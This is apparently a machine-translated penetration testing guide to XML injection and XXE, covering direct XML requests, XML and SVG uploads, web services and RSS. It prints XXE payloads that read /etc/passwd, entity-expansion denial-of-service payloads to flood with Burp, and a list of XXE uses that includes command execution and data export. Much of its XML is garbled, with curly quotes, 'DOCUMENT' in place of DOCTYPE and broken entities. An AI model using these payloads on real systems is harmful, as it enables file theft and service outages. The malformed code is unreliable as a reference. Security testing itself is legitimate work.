Black Box Penetration Testing Guide: XML Injection

I. attack scenarios

• Send XML requests directly

1. described

   Many application systems or components need to send xml requests (get or post requests) to the background for processing. By identifying the xml requests sent by the foreground to the background, using proxy interception tools to intercept the requests, and using XXE attack methods to modify the xml request body for testing,

test method

First, look for a link that directly sends an xml request. For example, if you catch the following link, for example, https://127.0.0.1:8443/test/test.action, the post parameters submitted include the following parameters, such as:

req=<? xml version=”1.0″ encoding=”UTF-8″>

<employees>

<employee>

<name>bcbccb.cn</name>

<sex>m</sex>

<age>30</age>

</employee>

</employees>

It can be seen from the parameter body that the content of the sending request is in xml format. At this time, if the system supports echo, the following requests can be sent:

<? xml version=”1.0″ encoding=”UTF-8″>

<! DOCTYPE mytest[

<! ELEMENT secret ANY>

<! ENTITY xxe SYSTEM “file:///etc/passwd”>]>

<secTest>&xxe;</secTest>

<employees>

<employee>

<name>bcbccb.cn</name>

<sex>m</sex>

<age>30</age>

</employee>

</employees>

At this time, the content of the passwd file in the linux server can be displayed on the page, resulting in the disclosure of sensitive information such as the user name of the operating system.

To draw an example, if you can know the absolute path of a file, you can view the contents of any file.

• Upload xml file

1. described

   Many devices allow uploading configuration files in xml format for firmware upgrades. If the backend code directly parses the uploaded xml configuration file without any filtering, it will easily lead to xml injection, which will use xml injection to send extremely large strings to carry out a denial of service attack, which will eventually lead to device paralysis.

2. test method

Traverse the system functions to find functional modules that can upload xml format, upload an xml at will, use a proxy interception tool such as burpsuite to intercept, and modify the xml content to a very large string, such as the following code:

<? xml version=”1.0″ encoding=”UTF-8″>

<! DOCUMENT something[

<! ENTITY x0 “Developers!&# 8221;>

<! ENTITY x1 “&x0;&x0;”>

<! ENTITY x2 “&x1;&x1;”>

…….

<! ENTITY x100 “&x99;&x99;”>]>

<something>&x100;</something>

Use burpsuite to send requests to intrader, starting 127 threads to send a large number of requests.

Finally, check whether the device is being accessed slowly and whether it has been attacked by a denial of service.

• webservice interface

1. described

   Since the data transmitted by the webservice interface is mainly xml data, as long as the foreground sends an xml request, there may be xml injection when processing the xml request in the background.

2. test method

   In addition to using tools such as appscan and AWVS to scan, you can also use tools such as soapui to debug webservices to manually send test data. The test method is actually similar to the above xml injection scenario, where attack data is inserted into the xml data sent to the server.

   For example, inserting new data, bypassing login, sending long data, causing DDOS

• Upload svg file

There is a scene where svg files are uploaded on a certain website.

At this time, you can intercept the request, modify the request information, and insert the following code to form an XXE injection attack.

<! DOCUMENT svg[<! ENTITY test SYSTEM \”file:///etc/passwd\”>]>

• Send requests that contain RSS files directly

  RSS is based on the xml standard and is a widely used content packaging and delivery protocol on the Internet. RSS(Really Simple Syndication) is a format for describing and synchronizing website content and is the most widely used xml application.

  A website that allows users to use custom RSS can cause an XXE attack by referencing external entities in the file.

• XEE(XML Entity Inflation)

  The main attempt is to carry out dos attacks through the server environment that consumes the target program. This attack is achieved by creating a definition of a custom entity in the DOCTYPE of xml. For example, this definition can generate an xml structure in memory that is much larger than the original allowable size of xml, allowing this attack to consume memory resources necessary for the network server to operate normally and effectively.

  For example, add the following code:

  <! DOCTYPE root[<! ENTITY test “TestString”>]>

  After uploading, the system returned an error and the echo showed TestString

  Upload a dos attack script, like this:

<! ENTITY x1 “&x0;&x0;”>

<! ENTITY x2 “&x1;&x1;”>

…….

<! ENTITY x100 “&x99;&x99;”>]>

Observe that the background cpu utilization rate exceeds 100%, causing the system to restart.

II. impact

May lead to unauthorized data addition and bypass login. In addition, it may lead to denial of service attacks on application systems, disclosure of server information, etc.

XXE Utilization method for reference:

1. Use the file protocol to access/dev/random or/dev/zero to perform a denial of service attack

2. Upload an xml parsing bomb to carry out a denial of service attack

3. Access the root directory through the file protocol to enumerate directories

4. Access ip+port through http protocol to scan and explore the port's intranet

5. File upload action is caused through jar protocol

6. Executing arbitrary commands through the expect protocol

7. Outsourcing data through http protocol

8. Using php protocol to export data

9. Using ftp protocol to export data

10. Using gopher protocol to export data